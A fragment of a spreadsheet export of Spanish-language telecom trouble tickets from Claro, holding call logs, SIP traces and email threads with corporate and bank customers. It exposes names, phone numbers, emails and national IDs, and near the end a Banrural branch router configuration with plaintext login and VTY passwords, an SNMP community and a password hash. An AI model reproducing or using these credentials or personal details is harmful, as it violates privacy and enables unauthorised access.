    <t>--- WALTER ANIBAL REYES 45787911 (CLIENTE) REPORTA OTRO ENLACE DEL MISMO PUNTO SD1126148//F4565332 (ID: 38300622), NO AUTORIZA EL CIERRE DE ESTE CASO HASTA RECIBIR EL DIAGNOSTICO DEL RECIEN APERTURADO. ...</t>
  </si>
  <si>
    <t>***--- SE ENVÍA CORREO A CL CONFIRMANDO QUE SE ADJUNTARON AMBAS GRAFICAS  Y SOLICITANDO VALIDAR -***
DE: EDUARDO LUIS PINEDA ZELEDA
ENVIADO EL: LUNES, 16 DE MAYO DE 2022 23:53
PARA: WALTER ANIBAL REYES &lt;WALTER.REYES@SOMOSCMI.COM&gt;
CC: HELPDESK@CAMPERO.COM; NOC ALIMENTOS &lt;NOC.ALIMENTOS@SOMOSCMI.COM&gt;; DIEGO PABLO AJIN HERNANDEZ &lt;DIEGO.AJIN@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: C136 - ENLACE CLARO - CON ID 38300302; 625900188
BUENAS NOCHES ESTIMADO SR. REYES.
                PERSONAL A CARGO NOS CONFIRMA QUE SE ADJUNTARON LAS GRÁFICAS DE AMBOS SERVICIOS.
ADJUNTO DE NUEVO LAS IMÁGENES, PODRÍA APOYARNOS EN VALIDAR DESDE SU LADO EL FUNCIONAMIENTO ACTUAL E INDICARNOS SI PODRÍAMOS CERRAR NUESTRO TICKET.
CUALQUIER CONSULTA QUEDAMOS A LA ORDEN.
SALUDOS.</t>
  </si>
  <si>
    <t>--- EN LINEA CON WALTER ANIBAL REYES 45787911 (CLIENTE), CONFIRMA RECEPCION DE CORREO CON PRUEBAS, ESTA REVISANDO. ...</t>
  </si>
  <si>
    <t>F4565130</t>
  </si>
  <si>
    <t>SE LLAMO AL NUMERO DEL GDN Y LA LLAMADA COMPLETA.
SE HABLO CON EL CLIENTE AMANDA QUIEN INDICA QUE TIENE INCONVENIENTES CON LAS LLAMADAS ENTRANTES DE NUMEROS DE CELULAR.
2001721994
COLA:
NOMBRE: A: 0050322311800
NÚMERO: 0050322311800
DURACIÓN: 0:00:05
ESTADO: CONECTADA
DETALLES: 0050322311800
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 16/05/2022 14:40:09</t>
  </si>
  <si>
    <t>F4565136</t>
  </si>
  <si>
    <t>CLIENTE INDICA QUE SI  TIENE LLAMADAS ENTRANTES Y SALIENTES, PERO QUE EN OCASIONES TIENEN PERDIDA DE AUDIO O BIEN SE CORTAN, INDICA QUE POR EL MOMENTO SOLO HA HECHO PRUEBAS CON NUMEROS FIJO
SE LE EXPLICA ACERCA DE LA AFECTACION, CLIENTE ESTARA PENDIENTE DE LOS AVANCES
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE PROCEDE A LOCALIZAR AL CLIENTE WILBER VENTURA 78415118
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4565138</t>
  </si>
  <si>
    <t>--- SE RECIBE CORREO DEL CLIENTE. ...
DE: WALTER ANIBAL REYES [MAILTO:WALTER.REYES@SOMOSCMI.COM]
ENVIADO EL: LUNES, 16 DE MAYO DE 2022 17:29
PARA: TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;
CC: HELPDESK@CAMPERO.COM; NOC ALIMENTOS &lt;NOC.ALIMENTOS@SOMOSCMI.COM&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: C144 - ENLACE DE INTERNET 38300499
BUENA TARDE, COMPARTIR AVANCES, ESTATUS DE SOLUCIÓN.
SALUDOS,
 	WALTER ANIBAL REYES
ADMINISTRADOR DE PROYECTOS
WALTER.REYES@SOMOSCMI.COM
CMI ALIMENTOS	
CMI LA FUERZA QUE NOS UNE PARA TRASCENDER
WWW.SOMOSCMI.COM
LEGAL/PRIVACY
...</t>
  </si>
  <si>
    <t>--- SE RESPONDE CORREO AL CLIENTE. ...
DE: DIEGO PABLO AJIN HERNANDEZ
ENVIADO EL: LUNES, 16 DE MAYO DE 2022 18:31
PARA: WALTER ANIBAL REYES &lt;WALTER.REYES@SOMOSCMI.COM&gt;
CC: HELPDESK@CAMPERO.COM; NOC ALIMENTOS &lt;NOC.ALIMENTOS@SOMOSCMI.COM&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; FONSECA BUSTAMANTE, KEVYN ANTONIO &lt;KEVYN.FONSECA@CLARO.COM.GT&gt;
ASUNTO: RE: C144 - ENLACE DE INTERNET 38300499
WALTER.
                SE SOLICITA APOYO A KEVYN FONSECA (LÍDER) PARA LA RESPECTIVA RETROALIMENTACIÓN.
QUEDAMOS A LA ESPERA DE LOS COMENTARIOS POR PARTE DE CNOC CA.
...</t>
  </si>
  <si>
    <t>***--- SE ENVÍA CORREO A CL SOLICITANDO VALIDAR ---***
DE: EDUARDO LUIS PINEDA ZELEDA
ENVIADO EL: MARTES, 17 DE MAYO DE 2022 01:49
PARA: WALTER ANIBAL REYES &lt;WALTER.REYES@SOMOSCMI.COM&gt;
CC: HELPDESK@CAMPERO.COM; NOC ALIMENTOS &lt;NOC.ALIMENTOS@SOMOSCMI.COM&gt;; DIEGO PABLO AJIN HERNANDEZ &lt;DIEGO.AJIN@CLARO.COM.GT&gt;; ALEJANDRO NAVARRO FERNANDEZ &lt;ALEJANDRO.NAVARRO@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; FONSECA BUSTAMANTE, KEVYN ANTONIO &lt;KEVYN.FONSECA@CLARO.COM.GT&gt;
ASUNTO: RE: C144 - ENLACE DE INTERNET 38300499
ESTIMADO SR. REYES.
                PODRÍA APOYARNOS EN VALIDAR EL FUNCIONAMIENTO ACTUAL E INDICARNOS SI PODRÍAMOS CERRAR NUESTRO TICKET.
CUALQUIER CONSULTA QUEDAMOS A LA ORDEN.
SALUDOS.</t>
  </si>
  <si>
    <t xml:space="preserve">
DE: ALEJANDRO NAVARRO FERNANDEZ &lt;ALEJANDRO.NAVARRO@CLARO.COM.GT&gt;
ENVIADO: LUNES, 16 DE MAYO DE 2022 18:53
PARA: DIEGO PABLO AJIN HERNANDEZ &lt;DIEGO.AJIN@CLARO.COM.GT&gt;; WALTER ANIBAL REYES &lt;WALTER.REYES@SOMOSCMI.COM&gt;
CC: HELPDESK@CAMPERO.COM &lt;HELPDESK@CAMPERO.COM&gt;; NOC ALIMENTOS &lt;NOC.ALIMENTOS@SOMOSCMI.COM&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; FONSECA BUSTAMANTE, KEVYN ANTONIO &lt;KEVYN.FONSECA@CLARO.COM.GT&gt;
ASUNTO: RE: C144 - ENLACE DE INTERNET 38300499
BUENAS NOCHES ESTIMADOS(A):
COMO PARTE DEL SEGUIMIENTO AL CASO RE: C144 - ENLACE DE INTERNET 38300499, SOLICITAMOS DE SU AMABLE APOYO PARA VALIDAR SI AÚN PERSISTEN LOS INCONVENIENTES ANTES PLANTEADOS. SE OBSERVA DE NUESTRA PARTE ENLACE OPERATIVO LLEGANDO SIN PROBLEMAS A IP WAN DE PUNTO REMOTO Y CON SALIDA HACIA INTERNET. SE ADJUNTAN GRÁFICAS DEL SERVICIO DURANTE EL DÍA DE HOY. GRACIAS DE ANTEMANO. SALUDOS CORDIALES.
FIGURA 1. SE VALIDA ENLACE CON SALIDA HACIA INTERNET.
FIGURA 2. SE VALIDA GRÁFICA DEL SERVICIO.</t>
  </si>
  <si>
    <t>F4565140</t>
  </si>
  <si>
    <t>-*  SE HABLA CON JENIFER MORALES 41853376 (CLIENTE) INFORMA QUE LUEGO DEL REINICIO SERVICIO LEVANTO Y ACTUALMENT TODO OK, SOLICITA CIERRE DE TICKET -*
-*</t>
  </si>
  <si>
    <t>CLIEENTE HA REINICIADO SU PBX PERO AUN NO SE TIENEN RESPUESTA DE LA PBX ## NOS MANTIENE EN LINEA ##</t>
  </si>
  <si>
    <t>SE TIENE EN LÍNEA A JENNIFER MORALES/CLIENTE PARA CONFIRMAR LO DICHO EN CRONO ANTERIOR, A NIVEL DE CLARO ENLACE OK, SE PIDE APOYO A GESTIÓN AE VÍA SKYPE, EN TRIPARTITA GESTOR ASIGNADO Y CLIENTE; EN ESPERA DE LO QUE DETERMINEN.</t>
  </si>
  <si>
    <t>F4565141</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE ESTEFANIE SALAZAR Y SE COLOCO UNA TRAZA EN DONDE EL CLIENTE CONFIRMA LLAMADAS SALIENTES.
SE REALIZA UNA TRAZA EN DONDE SE VER QUE SI COMPLETA LA LLAMADA
L1: U 04/02/2022 11:23:03:130 COSLOG: SIP_UA_MESSAGE.C:218 I
SENT TO 10.16.246.199:5060
ACK SIP:53568614@IMSHWI.CLARO.COM.GT SIP/2.0
VIA: SIP/2.0/UDP 10.78.68.122:5060;BRANCH=Z9HG4BK-2505597971
FROM: +50222189292 &lt;SIP:+50222189292@IMSHWI.CLARO.COM.GT&gt;;TAG=3399742429
TO: &lt;SIP:53568614@IMSHWI.CLARO.COM.GT&gt;;TAG=SBC0402PV1X3JVH-CC-12
CALL-ID: 1555444304@10.78.68.122
CSEQ: 20 ACK
MAX-FORWARDS: 70
CONTENT-LENGTH: 0
2001728381
COLA:
NOMBRE: A: 55158158
NÚMERO: 55158158
DURACIÓN: 0:01:10
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 55158158
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 16/05/2022 15:02:34
CLIENTE VALIDA Y AUTORIZA EL CIERRE.</t>
  </si>
  <si>
    <t>F4565144</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE WENDY MARROQUIN 66339618 MENCIONA QUE PERSISTE EL INCONVENIENTE, SE NOTIFICARA PARA EL SEGUIMIENTO
-ID 2001749303</t>
  </si>
  <si>
    <t>F4565147</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE INGE CARLA PACHECOAL 77475313 NO RESPONDE, ENVIA A BUZON SE INTENTARA LUEGO **
ID 2001754866
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CLAUDIA SANCHEZ 78545589 CLIENTE NO RESPONDE, SE INTENTARA LUEGO **
ID 2001753741 - 2001753980
**</t>
  </si>
  <si>
    <t>F4565149</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ENCARGADO AGENCIA AL 24139400 PERO NO RESPONDE, SE INTENTARA LUEGO **
ID 2001756587
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MARLON NAVAS 30727797 RESPONDE WALTER AROCHE  QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 2001894</t>
  </si>
  <si>
    <t>F4565154</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JESSICA LOPEZ 56350730  INDICA QUE PERSISTE EL INCONVENIENTE QUE CONSTANTEMENTE SE LE CAE EL SERVICIO Y QUE EN ESTE MOMENTO NO TIENEN || SE NOTIFICA A GESTOR **
ID 2001758377
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JESSICA LOPEZ AL 56350730 INIDCA QUE POR EL MOMENTO ESTA ESTABLE QUE ESTARAN REALIZANDO PRUEBAS Y NOS RSTARAN  INFORMANDO **
ID 2001951380
**</t>
  </si>
  <si>
    <t>F4565157</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE ARELY CARBALLO, QUIEN INDICA QUE LAS LLAMADAS SE ESCUCHAN ENTRE CORTADO.
CON LLAMADAS DE CELULARES.
2001756756
COLA:
NOMBRE: A: 0050376672991
NÚMERO: 0050376672991
DURACIÓN: 0:00:07
ESTADO: MARCANDO
DETALLES: 0050376672991
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 16/05/2022 16:21:49</t>
  </si>
  <si>
    <t>F4565159</t>
  </si>
  <si>
    <t>SE ENVÍA CORREO A CLIENTE, SOLICITANDO ACCESOS PARA EL PERSONAL TECNICO.
DE: OMAR ALBERTO OCHOA HID &lt;OALBERTO.OCHOA@CLARO.COM.GT&gt;ENVIADO: LUNES, 16 DE MAYO DE 2022 17:58PARA: ROLANDO.ENRIQUEZ@CITI.COM &lt;ROLANDO.ENRIQUEZ@CITI.COM&gt;CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTES CORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.HN&gt;ASUNTO: 924114 || BANCO DE HONDURAS S A || 2 BO. RIO DE PIEDRAS, 18 AV. A, 9 Y 10 CALLE SUROESTE, SEGUNDO NIVEL SPS
BUENAS TARDES ESTIMADO CLIENTE,
DÁNDOLE SEGUIMIENTO AL CASO REPORTADO DEL BANCO DE HONDURAS S A - CON ID 924114 UBICADO EN 2 BO. RIO DE PIEDRAS, 18 AV. A, 9 Y 10 CALLE SUROESTE, SEGUNDO NIVEL SPS, SOLICITAMOS PODER GESTIONAR PERMISOS PARA REALIZAR LA MIGRACIÓN DE MEDIA CONVERTER A EQUIPOS ETX-1, SEGÚN LO PLATICADO VÍA TELEFÓNICA ESTAREMOS ATENTOS A LA PROGRAMACIÓN DE LA VENTANA DE MANTENIMIENTO, LA CUAL SERÁ PROGRAMADA POR UDS., FAVOR INDICARNOS DÍA Y HORA CON ANTICIPACIÓN PARA PODER PROGRAMAR LA VISITA Y PODER HACER EL CAMBIO A LA BREVEDAD POSIBLE. SALUDOS CORDIALES.
NOMBRE:                            IDENTIFICACIÓN:
OSCAR ALEJANDRO PAZ  0501-2000-11392
HUGO PINEDA                   0501-2000-09002
JOHN RAMOS                     0501-1995-07643
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>SE RECIBE CORREO DEL CLIENTE INDICA QUE SE PROCEDERA A REALIZAR Y TIEMPO ESTIMADO PARA SOLVENTAR EL INCOVENIENTE
DE: ENRIQUEZ, ROLANDO &lt;ROLANDO.ENRIQUEZ@CITI.COM&gt;
ENVIADO: MARTES, 17 DE MAYO DE 2022 11:08
PARA: CLIENTES CORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.HN&gt;; OMAR ALBERTO OCHOA HID &lt;OALBERTO.OCHOA@CLARO.COM.GT&gt;; PERDOMO, ERICK &lt;ERICK.PERDOMO@CITI.COM&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: 924114 || BANCO DE HONDURAS S A || 2 BO. RIO DE PIEDRAS, 18 AV. A, 9 Y 10 CALLE SUROESTE, SEGUNDO NIVEL SPS
HOLA ESTIMADOS,
ME AYUDAN CON LAS SIGUIENTES ACLARACIONES:
1.- DEFINICIÓN DEL CIRCUITO CORRECTO A ACTUALIZAR
2.- CUANTO TIEMPO SE NECESITA PARA EJECUTAR EL CAMBIO
ATTE,
ROLANDO ENRIQUEZ
SUPERVISOR DE INFRAESTRUCTURA | CTI
CITI HONDURAS
EDIFICIO AGALTA, NIVEL 15, BOULEVARD MORAZÁN, TEGUCIGALPA
HONDURAS
TELÉFONO: + 504.2290.2190 | EXT. 2190 | MÓVIL: + 504.9455.2980
ROLANDO.ENRIQUEZ@CITI.COM</t>
  </si>
  <si>
    <t>###SE LE RESPONDE CORREO AL CLIENTE##
DE: VELDIN JANITZIO PALENCIA FLORES &lt;VELDIN.PALENCIA@CLARO.COM.GT&gt;
ENVIADO: MIÉRCOLES, 18 DE MAYO DE 2022 8:04
PARA: ENRIQUEZ, ROLANDO &lt;ROLANDO.ENRIQUEZ@CITI.COM&gt;; CLIENTES CORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.HN&gt;; OMAR ALBERTO OCHOA HID &lt;OALBERTO.OCHOA@CLARO.COM.GT&gt;; PERDOMO, ERICK &lt;ERICK.PERDOMO@CITI.COM&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: 924114 || BANCO DE HONDURAS S A || 2 BO. RIO DE PIEDRAS, 18 AV. A, 9 Y 10 CALLE SUROESTE, SEGUNDO NIVEL SPS
MUY BUEN DÍA ESTIMADOS.
SE REVISARÁ EL ENLACE 924114OH Y SE TENDRÁ UN TIEMPO ESTIMADO DE DOS HORAS PARA PODER REALIZAR EL CAMBIO. PARA QUE NOS PUEDA APOYAR GESTIONANDO LOS ACCESOS DEL PERSONAL, INDICANDO EL DÍA Y HORA DE VISITA. MUCHAS GRACIAS
SALUDOS CORDIALES</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ENRIQUEZ ROLANDO 94552980 MENCIONA QUE ESTARA ENVIANDO POR CORREO EL HORARIO Y FECHA
-ID 2001904203</t>
  </si>
  <si>
    <t>16/05/2022 17:42:14 GUATEMALA/CENTRO AMERICA (OMAR ALBERTO OCHOA HID):
SE CONTACTA A CLIENTE ROLANDO ENRIQUEZ 22902190 QUIEN SOLICITA QUE SE LE PUEDA ENVIAR LOS DATOS DE PERSONAL TÉCNICO AL CORREO ROLANDO.ENRIQUEZ@CITI.COM INDICA QUE ESTE CAMBIO DEBE REALIZARSE EN VENTANA DE MANTENIMIENTO Y ELLOS ESTARÁN INDICANDONOS VIA CORREO EL DIA Y LA HORA A LA QU ESTA SE PODRÁ LLEVAR A CABO.
2001777548</t>
  </si>
  <si>
    <t>F4565164</t>
  </si>
  <si>
    <t>SE LLAMO AL NUMERO DEL GDN Y LA LLAMADA COMPLETA.
SE HABLO CON EL CLIENTE BRENDA QUIEN INDICA QUE ESCUCHA INTERFERENCIA EN LAS LLAMADAS ENTRANTES
2001734368
COLA:
NOMBRE: A: 0050322342200
NÚMERO: 0050322342200
DURACIÓN: 0:00:09
ESTADO: MARCANDO
DETALLES: 0050322342200
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 16/05/2022 15:15:49</t>
  </si>
  <si>
    <t>F4565168</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CARLOS CASTRO-78427208 -- CONFMIRA QUE TIENE ENTRECORTE DE LLAMADAS ##VIVO</t>
  </si>
  <si>
    <t>F4565169</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE BLANCA CHAVEZ, PERO NO CONTESTA.
2001739386
COLA:
NOMBRE: A: 0050378591630
NÚMERO: 0050378591630
DURACIÓN: 0:00:10
ESTADO: MARCANDO
DETALLES: 0050378591630
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 16/05/2022 15:29:56</t>
  </si>
  <si>
    <t>SE LLAMO AL NUMERO DEL GDN Y LA LLAMADA COMPLETA.  SE HABLO CON EL CLIENTE BLANCA CHAVEZ QUIEN INDICA QUE TIENEN INCONVENIENTES CON LAS LLAMADAS ENTRANTES.
2001739591
COLA:
NOMBRE: A: 0050322408100
NÚMERO: 0050322408100
DURACIÓN: 0:00:13
ESTADO: MARCANDO
DETALLES: 0050322408100
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 16/05/2022 15:30:47</t>
  </si>
  <si>
    <t>F4565172</t>
  </si>
  <si>
    <t>SE LLAMA A CLEINTE ROSMERY VASQUEZ---22459100   -- COMENTA QUE EL REPORTE ES: ENTRECORTE DE LLAMADAS- #### SE TIENE FALLA MASIVA ##</t>
  </si>
  <si>
    <t>F4565176</t>
  </si>
  <si>
    <t>DE: ALEJANDRO NAVARRO FERNANDEZ &lt;ALEJANDRO.NAVARRO@CLARO.COM.GT&gt;
ENVIADO: MIÉRCOLES, 18 DE MAYO DE 2022 20:50
PARA: CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; AGE FIGUEROA, WALTER ESTUARDO &lt;ESTUARDO.FIGUEROA@BANRURAL.COM.GT&gt;; NOC CORPORATIVO &lt;NOC@REDOPTIMA.NET&gt;; AGE GONZALEZ, MAYRA &lt;MAYRA.GONZALES@BANRURAL.COM.GT&gt;; AGE LOPEZ, JOAQUIN &lt;JOAQUIN.LOPEZ@BANRURAL.COM.GT&gt;; ALESSANDRO AJCHE CASTILLO &lt;ALESSANDRO.AJCHE@CLARO.COM.GT&gt;; AGE CASTANEDA, DAVID &lt;DAVID.CASTANEDA@BANRURAL.COM.GT&gt;; AGE RODRIGUEZ, EMILDA &lt;EMILDA.RODRIGUEZ@BANRURAL.COM.GT&gt;; AGE BARILLAS, HECTOR &lt;HECTOR.BARILLAS@BANRURAL.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: RE: AP AG-723 C.C LOS PROCERES ALARMADO - BANRURAL
BUENAS NOCHES ESTIMADOS (A):
COMO PARTE DEL SEGUIMIENTO AL CASO, SE VALIDA QUE INTERFAZ EN EQUIPO MEDIA CONVERTER HACIA CPE SE ENCUENTRA DOWN, SE CAMBIAN NEGOCIACIONES, SE APAGA Y ENCIENDE PUERTO, PERO NO ES POSIBLE RESTABLECER LA MISMA. SE HACE NECESARIO REALIZAR PRUEBAS CON PUNTO REMOTO Y SI YA FUERON REALIZADAS, INDICAR PARA COORDINAR VISITA A SITIO. SALUDOS CARDIALES. GRACIAS DE ANTEMANO</t>
  </si>
  <si>
    <t>SE LLAMÓ A PR 25041501 EXT 072311 PARA SEGUIMIENTO, NO CONTESTA; SE HABLARÁ CON CENTRAL; 23742016 NO CONTESTA; SE PIDE APOYO VÍA CORREO:
ASUNTO: RE: AP AG-723 C.C LOS PROCERES ALARMADO - BANRURAL</t>
  </si>
  <si>
    <t>&lt;GNCYGTVGN1T1E06B02EIM4&gt;PING -VPN-INSTANCE INTERNET_GT_METRO 10.174.168.79
  PING 10.174.168.79: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    REPLY FROM 10.174.168.79: BYTES=56 SEQUENCE=1 TTL=255 TIME=3 MS
    REPLY FROM 10.174.168.79: BYTES=56 SEQUENCE=2 TTL=255 TIME=1 MS
    REPLY FROM 10.174.168.79: BYTES=56 SEQUENCE=3 TTL=255 TIME=1 MS
    REPLY FROM 10.174.168.79: BYTES=56 SEQUENCE=4 TTL=255 TIME=2 MS
    REPLY FROM 10.174.168.79: BYTES=56 SEQUENCE=5 TTL=255 TIME=1 MS
  --- 10.174.168.79 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    5 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/3 MS
&lt;GNCYGTVGN1T1E06B02EIM4&gt;TELENT VPN-INSTANCE INTERNET_GT_METRO 10.174.168.79
                        ^
ERROR: UNRECOGNIZED COMMAND FOUND AT '^' POSITION.
&lt;GNCYGTVGN1T1E06B02EIM4&gt;TELNET VPN-INSTANCE INTERNET_GT_METRO 10.174.168.79
TRYING 10.174.168.79 ...
PRESS CTRL+K TO ABORT
CONNECTED TO 10.174.168.79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 LOGIN INVALID
USERNAME:
USERNAME: GESTIONIP
PASSWORD:
% LOGIN INVALID
USERNAME: GESTIONIP
PASSWORD:
CC_BANRURAL_GT_INTERNET_AGENCIA_0723#SHO RUN
BUILDING CONFIGURATION...
CURRENT CONFIGURATION : 3896 BYTES
!
VERSION 15.2
NO SERVICE PAD
SERVICE TIMESTAMPS DEBUG DATETIME MSEC
SERVICE TIMESTAMPS LOG DATETIME MSEC
NO SERVICE PASSWORD-ENCRYPTION
!
HOSTNAME CC_BANRURAL_GT_INTERNET_AGENCIA_0723
!
BOOT-START-MARKER
BOOT-END-MARKER
!
!
ENABLE SECRET 5 $1$8CCU$1CA9N6/V2DY08NNI/S5US1
!
NO AAA NEW-MODEL
WAN MODE ETHERNET
CLOCK TIMEZONE GUA -6 0
!
!
!
IP DHCP EXCLUDED-ADDRESS 10.10.10.1
IP DHCP EXCLUDED-ADDRESS 192.168.1.1
!
IP DHCP POOL CCP-POOL
 IMPORT ALL
 NETWORK 10.10.10.0 255.255.255.128
 DEFAULT-ROUTER 10.10.10.1
 LEASE 0 2
!
IP DHCP POOL MERAKI
 NETWORK 192.168.1.0 255.255.255.0
 DEFAULT-ROUTER 192.168.1.1
 DNS-SERVER 216.230.128.32 8.8.8.8
!
!
!
NO IP DOMAIN LOOKUP
IP DOMAIN NAME YOURDOMAIN.COM
IP CEF
NO IPV6 CEF
!
!
!
!
!
!
!
USERNAME GESTIONIP PRIVILEGE 15 PASSWORD 0 CLAR0
!
!
CONTROLLER VDSL 0
 SHUTDOWN
!
!
!
!
!
!
!
!
!
!
!
!
!
INTERFACE LOOPBACK5
 DESCRIPTION MONITOREO DEL CNOC
 IP ADDRESS 10.212.176.35 255.255.255.255
!
INTERFACE ATM0
 NO IP ADDRESS
 SHUTDOWN
 NO ATM ILMI-KEEPALIVE
!
INTERFACE ETHERNET0
 DESCRIPTION INTERFACE ACTUALMENTE NO ESTA EN USO
 NO IP ADDRESS
 SHUTDOWN
!
INTERFACE FASTETHERNET0
 DESCRIPTION INTERFACE ACTUALMENTE NO ESTA EN USO
 NO IP ADDRESS
 SHUTDOWN
!
INTERFACE FASTETHERNET1
 DESCRIPTION LAN DEL CLIENTE
 NO IP ADDRESS
!
INTERFACE FASTETHERNET2
 DESCRIPTION INTERFACE ACTUALMENTE NO ESTA EN USO
 NO IP ADDRESS
 SHUTDOWN
!
INTERFACE FASTETHERNET3
 NO IP ADDRESS
!
INTERFACE GIGABITETHERNET0
 NO IP ADDRESS
 LOAD-INTERVAL 30
 DUPLEX FULL
 SPEED 100
!
INTERFACE GIGABITETHERNET1
 DESCRIPTION WAN PRINCIPAL/_/832000040T/_/
 BANDWIDTH 5120
 IP ADDRESS 10.174.168.79 255.255.255.224
 IP NAT OUTSIDE
 IP VIRTUAL-REASSEMBLY IN
 LOAD-INTERVAL 30
 DUPLEX FULL
 SPEED 100
!
INTERFACE VLAN1
 DESCRIPTION LAN DEL CLIENTE
 IP ADDRESS 192.168.1.1 255.255.255.0 SECONDARY
 IP ADDRESS 181.209.219.137 255.255.255.252
 IP NAT INSIDE
 IP VIRTUAL-REASSEMBLY IN
 RATE-LIMIT INPUT 5120000 960000 1920000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 RATE-LIMIT OUTPUT 5120000 960000 1920000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 IP TCP ADJUST-MSS 1452
!
IP FORWARD-PROTOCOL ND
NO IP HTTP SERVER
IP HTTP ACCESS-CLASS 23
IP HTTP AUTHENTICATION LOCAL
IP HTTP SECURE-SERVER
IP HTTP TIMEOUT-POLICY IDLE 60 LIFE 86400 REQUESTS 10000
!
!
IP NAT POOL MERAKI 181.209.219.137 181.209.219.138 NETMASK 255.255.255.252
IP NAT INSIDE SOURCE LIST 1 POOL MERAKI OVERLOAD
IP ROUTE 0.0.0.0 0.0.0.0 10.174.168.65
!
LOGGING SOURCE-INTERFACE LOOPBACK5
ACCESS-LIST 1 PERMIT 192.168.1.0 0.0.0.255
ACCESS-LIST 23 PERMIT 10.10.10.0 0.0.0.127
ACCESS-LIST 88 REMARK MONITOREO DE CLARO
ACCESS-LIST 88 PERMIT 10.255.24.144 0.0.0.7
ACCESS-LIST 88 PERMIT 190.148.15.192 0.0.0.15
MAC-ADDRESS-TABLE AGING-TIME 15
NO CDP RUN
!
SNMP-SERVER COMMUNITY NM15SNMPRO RO 88
SNMP-SERVER TRAP-SOURCE LOOPBACK5
SNMP-SERVER LOCATION INTERNET_16 CALLE 2-00 ZONA 10 C.C. LOS PROCERES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CLARO
 LOGGING SYNCHRONOUS
 LOGIN
 NO MODEM ENABLE
LINE AUX 0
LINE VTY 0
 PASSWORD CLARO
 LOGIN LOCAL
 NO ACTIVATION-CHARACTER
 TRANSPORT PREFERRED NONE
 TRANSPORT INPUT ALL
 STOPBITS 1
LINE VTY 1 4
 LOGIN LOCAL
 TRANSPORT PREFERRED NONE
 TRANSPORT INPUT ALL
!
SCHEDULER ALLOCATE 60000 1000
!
END
CC_BANRURAL_GT_INTERNET_AGENCIA_0723#    SHO IP INT BRIE
INTERFACE                  IP-ADDRESS      OK? METHOD STATUS                PROTOCOL
ATM0                       UNASSIGNED      YES NVRAM  ADMINISTRATIVELY DOWN DOWN
ETHERNET0                  UNASSIGNED      YES NVRAM  ADMINISTRATIVELY DOWN DOWN
FASTETHERNET0              UNASSIGNED      YES UNSET  ADMINISTRATIVELY DOWN DOWN
FASTETHERNET1              UNASSIGNED      YES UNSET  DOWN                  DOWN
FASTETHERNET2              UNASSIGNED      YES UNSET  ADMINISTRATIVELY DOWN DOWN
